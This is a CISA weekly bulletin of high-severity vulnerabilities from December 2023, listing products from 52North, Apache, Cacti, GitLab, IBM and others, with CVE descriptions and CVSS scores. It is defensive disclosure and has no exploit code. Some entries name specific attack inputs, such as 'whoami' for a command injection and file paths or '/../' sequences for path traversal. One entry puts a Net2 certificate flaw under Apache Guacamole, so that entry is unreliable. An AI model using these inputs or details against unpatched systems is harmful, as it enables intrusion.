Vulnerability Summary for the Week of December 18, 2023
The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.
Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:
- High: vulnerabilities with a CVSS base score of 7.0–10.0
- Medium: vulnerabilities with a CVSS base score of 4.0–6.9
- Low: vulnerabilities with a CVSS base score of 0.0–3.9
Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.
High Vulnerabilities
Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
52north -- 52north_wps | An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. | 2023-12-19 | 7.2 | CVE-2023-6280 cve-coordination@incibe.es |
aditaas -- allied_digital_integrated_tool-as-a-service | The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform. Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers' data and completely compromise the targeted platform. | 2023-12-18 | 9.8 | CVE-2023-6483 vdisclose@cert-in.org.in |
apache -- doris | The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues. | 2023-12-18 | 8.2 | CVE-2023-41314 security@apache.org |
apache -- dubbo | A deserialization vulnerability existed when decode a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue. | 2023-12-15 | 9.8 | CVE-2023-29234 security@apache.org security@apache.org |
apache -- dubbo | Deserialization of Untrusted Data vulnerability in Apache Dubbo. This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue. | 2023-12-15 | 9.8 | CVE-2023-46279 security@apache.org security@apache.org |
apache -- guacamole | Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue. | 2023-12-19 | 8.8 | CVE-2023-43826 security@apache.org security@apache.org |
apache -- guacamole | When installing the Net2 software a root certificate is installed into the trusted store. A potential hacker could access the installer batch file or reverse engineer the source code to gain access to the root certificate password. Using the root certificate and password they could then create their own certificates to emulate another site. Then by establishing a proxy service to emulate the site they could monitor traffic passed between the end user and the site allowing access to the data content. | 2023-12-19 | 8.1 | CVE-2023-43870 cert@ncsc.nl |
apache -- pulsar | Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions. | 2023-12-20 | 7.5 | CVE-2023-37544 security@apache.org security@apache.org |
apache -- superset | An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue. | 2023-12-19 | 7.7 | CVE-2023-49734 security@apache.org security@apache.org |
armorxgt -- spamtrap | ArmorX Global Technology Corporation ArmorX Spam has insufficient validation for user input within a special function. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. | 2023-12-15 | 9.8 | CVE-2023-48384 twcert@cert.org.tw |
aveva -- edge | An issue was discovered in ExecuteCommand() in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior that allows unauthenticated arbitrary commands to be executed. | 2023-12-16 | 9.8 | CVE-2021-42796 cve@mitre.org cve@mitre.org |
aveva -- edge | Path traversal vulnerability in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior allows an unauthenticated user to steal the Windows access token of the user account configured for accessing external DB resources. | 2023-12-16 | 7.5 | CVE-2021-42797 cve@mitre.org cve@mitre.org |
awslabs -- sandbox-accounts-for-events | "Sandbox Accounts for Events" provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. | 2023-12-22 | 7.1 | CVE-2023-50928 security-advisories@github.com security-advisories@github.com |
awslabs -- sandbox-accounts-for-events | Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. | 2023-12-22 | 7.8 | CVE-2023-51386 security-advisories@github.com security-advisories@github.com |
backupbliss -- backup_migration | The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server. | 2023-12-15 | 9.8 | CVE-2023-6553 security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com security@wordfence.com |
bazarr -- bazarr | Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. | 2023-12-15 | 7.5 | CVE-2023-50264 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
bazarr -- bazarr | Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. | 2023-12-15 | 7.5 | CVE-2023-50265 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
bosch -- cpp13_firmware | A command injection vulnerability exists in Bosch IP cameras that allows an authenticated user with administrative rights to run arbitrary commands on the OS of the camera. | 2023-12-18 | 7.2 | CVE-2023-39509 psirt@bosch.com |
bosch -- monitor_wall | An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. | 2023-12-18 | 7.5 | CVE-2023-32230 psirt@bosch.com |
cacti -- cacti | Cacti is a robust performance and fault management framework and a frontend to RRDTool - a Time Series Database (TSDB). While using the detected SQL Injection and insufficient processing of the include file path, it is possible to execute arbitrary code on the server. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `link.php`. Impact of the vulnerability execution of arbitrary code on the server. | 2023-12-21 | 8 | CVE-2023-49084 security-advisories@github.com |
cacti -- cacti | Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability - arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. | 2023-12-22 | 8.8 | CVE-2023-49085 security-advisories@github.com security-advisories@github.com |
cacti -- cacti | Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `'managers.php'`. An authenticated attacker with the "Settings/Utilities" permission can send a crafted HTTP GET request to the endpoint `'/cacti/managers.php'` with an SQLi payload in the `'selected_graphs_array'` HTTP GET parameter. As of time of publication, no patched versions exist. | 2023-12-22 | 8.8 | CVE-2023-51448 security-advisories@github.com security-advisories@github.com |
cambium_ -- epmp_force_300-25 | Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges. | 2023-12-18 | 7.8 | CVE-2023-6691 ics-cert@hq.dhs.gov |
clickhouse -- clickhouse | ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol, however, the attacker will need a valid credential as the HTTP authentication take places first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts. | 2023-12-20 | 7 | CVE-2023-47118 security-advisories@github.com |
clickhouse -- clickhouse | ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. | 2023-12-22 | 7 | CVE-2023-48704 security-advisories@github.com security-advisories@github.com |
codelyfe -- stupid_simple_cms | A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259. | 2023-12-17 | 9.8 | CVE-2023-6901 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
codelyfe -- stupid_simple_cms | A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260. | 2023-12-17 | 9.8 | CVE-2023-6902 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
codelyfe -- stupid_simple_cms | A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability. | 2023-12-18 | 9.1 | CVE-2023-6907 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
csharp -- cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform, its file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48376 twcert@cert.org.tw |
csharp -- cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform, it has a vulnerability of missing authorization and users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated with normal user privilege can execute administrator privilege, resulting in performing arbitrary system operations or disrupting service. | 2023-12-15 | 8.8 | CVE-2023-48375 twcert@cert.org.tw |
cybrosys -- website_blog_search | A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. | 2023-12-15 | 9.8 | CVE-2023-48049 cve@mitre.org |
dell -- cpg_bios | Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. | 2023-12-22 | 7.2 | CVE-2023-43088 security_alert@emc.com |
dell -- supportassist_client_consumer | Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. | 2023-12-22 | 7.3 | CVE-2023-48670 security_alert@emc.com |
dlink -- dir-850l_firmware | An issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter. | 2023-12-19 | 9.8 | CVE-2023-49004 cve@mitre.org |
dromara_hertzbeat -- dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1. | 2023-12-22 | 7.2 | CVE-2023-51387 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
dromara_hertzbeat -- dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. | 2023-12-22 | 7.5 | CVE-2023-51650 security-advisories@github.com security-advisories@github.com |
dromara_hertzbeat -- dromara_hertzbeat | Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. | 2023-12-22 | 7.5 | CVE-2022-39337 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
efacec -- bcu_500 | Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device. | 2023-12-20 | 9.6 | CVE-2023-50707 ics-cert@hq.dhs.gov |
efacec -- bcu_500 | A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application. | 2023-12-20 | 8.2 | CVE-2023-6689 ics-cert@hq.dhs.gov |
engelsystem -- engelsystem | Englesystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user's context. This vulnerability enables an authenticated user to inject Javascript into other user's sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. | 2023-12-22 | 7.3 | CVE-2023-50924 security-advisories@github.com security-advisories@github.com |
eset,_spol._s_r.o. -- eset_nod32_antivirus | Improper validation of the server's certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted. | 2023-12-21 | 7.5 | CVE-2023-5594 security@eset.com |
eurotel -- etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 does not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system. | 2023-12-19 | 9.8 | CVE-2023-6928 ics-cert@hq.dhs.gov |
eurotel -- etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access. | 2023-12-19 | 9.4 | CVE-2023-6930 ics-cert@hq.dhs.gov |
eurotel -- etl3100 | EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities. | 2023-12-19 | 7.5 | CVE-2023-6929 ics-cert@hq.dhs.gov |
forestblog -- forestblog | A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247. | 2023-12-17 | 9.8 | CVE-2023-6887 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
gallagher -- controller_6000 | A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. | 2023-12-18 | 7.5 | CVE-2023-24590 disclosures@gallagher.com |
getsentry -- sentry-javascript | Sentry-Javascript is official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry's Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0. | 2023-12-20 | 7.5 | CVE-2023-50249 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
github -- enterprise_server | Improper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0. | 2023-12-21 | 8 | CVE-2023-46647 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
github -- enterprise_server | An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 8.3 | CVE-2023-46648 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
github -- enterprise_server | An insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 8.1 | CVE-2023-6746 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
github -- enterprise_server | An insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 7.2 | CVE-2023-6802 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
github -- enterprise_server | An improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 7.5 | CVE-2023-6847 product-cna@github.com product-cna@github.com product-cna@github.com |
gitlab -- gitlab | A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner | 2023-12-17 | 8.8 | CVE-2023-3907 cve@gitlab.com cve@gitlab.com |
gitlab -- gitlab | An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. | 2023-12-15 | 8.1 | CVE-2023-6680 cve@gitlab.com |
gitlab -- gitlab | An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. | 2023-12-15 | 7.5 | CVE-2023-3904 cve@gitlab.com cve@gitlab.com |
gmarczynski -- dynamic_progress_bar | A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. | 2023-12-15 | 9.8 | CVE-2023-40954 cve@mitre.org cve@mitre.org |
grackle -- grackle | Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn't checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. | 2023-12-22 | 7.5 | CVE-2023-50730 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
hcl_software -- hcl_bigfix_platform | Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server. | 2023-12-21 | 7.7 | CVE-2023-37519 psirt@hcl.com |
hcl_software -- hcl_bigfix_platform | Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay. | 2023-12-21 | 7.7 | CVE-2023-37520 psirt@hcl.com |
hewlett_packard_enterprise -- multiple_products | A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass. | 2023-12-19 | 7.5 | CVE-2023-50272 security-alert@hpe.com |
hikvision -- intercom_broadcast_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:\ICPAS\Wnmp\WWW\php\conversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252. | 2023-12-17 | 7.5 | CVE-2023-6893 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
hitachi_energy -- rtu500_scripting_interface | A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by using faking the identity of a RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface. | 2023-12-19 | 7.4 | CVE-2023-1514 cybersecurity@hitachienergy.com |
hp -- system_management_homepage | A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information. | 2023-12-17 | 7.5 | CVE-2023-50271 security-alert@hpe.com |
ibm -- mq_appliance | IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536. | 2023-12-18 | 7.5 | CVE-2023-46177 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- planning_analytics | IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. | 2023-12-22 | 8 | CVE-2023-42017 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view modify files on the system. IBM X-Force ID: 271196. | 2023-12-20 | 9.1 | CVE-2023-47702 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341. | 2023-12-20 | 8.8 | CVE-2023-47706 psirt@us.ibm.com psirt@us.ibm.com |
ibm -- security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220. | 2023-12-20 | 7.5 | CVE-2023-47704 psirt@us.ibm.com psirt@us.ibm.com |
idemia -- sigma_lite_firmware | The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device. | 2023-12-15 | 9.8 | CVE-2023-33218 a87f365f-9d39-4848-9b3a-58c7cae69cab |
idemia -- sigma_lite_firmware | The handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device | 2023-12-15 | 9.8 | CVE-2023-33219 a87f365f-9d39-4848-9b3a-58c7cae69cab |
idemia -- sigma_lite_firmware | During the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device | 2023-12-15 | 9.8 | CVE-2023-33220 a87f365f-9d39-4848-9b3a-58c7cae69cab |
idemia -- sigma_lite_firmware | When reading DesFire keys, the function that reads the card isn't properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key. | 2023-12-15 | 9.8 | CVE-2023-33221 a87f365f-9d39-4848-9b3a-58c7cae69cab |
idemia -- sigma_lite_firmware | By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it's possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer | 2023-12-15 | 7.5 | CVE-2023-33217 a87f365f-9d39-4848-9b3a-58c7cae69cab |
imou -- imou_life_app | A session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks. | 2023-12-19 | 8.1 | CVE-2023-6913 cve-coordination@incibe.es |
infinispan -- infinispan | A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration. | 2023-12-18 | 7.2 | CVE-2023-5384 secalert@redhat.com secalert@redhat.com secalert@redhat.com |
istanbul_soft_informatics_and_consultancy_limited_company -- softomi_advanced_c2c_marketplace_software | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023. | 2023-12-21 | 9.8 | CVE-2023-6145 iletisim@usom.gov.tr |
itpison -- omicard_edm | ITPison OMICARD EDM's file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48371 twcert@cert.org.tw |
itpison -- omicard_edm | ITPison OMICARD EDM 's SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. | 2023-12-15 | 9.8 | CVE-2023-48372 twcert@cert.org.tw |
itpison -- omicard_edm | ITPison OMICARD EDM has a path traversal vulnerability within its parameter "FileName" in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48373 twcert@cert.org.tw |
ivanti -- avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. | 2023-12-19 | 9.8 | CVE-2023-41727 support@hackerone.com |
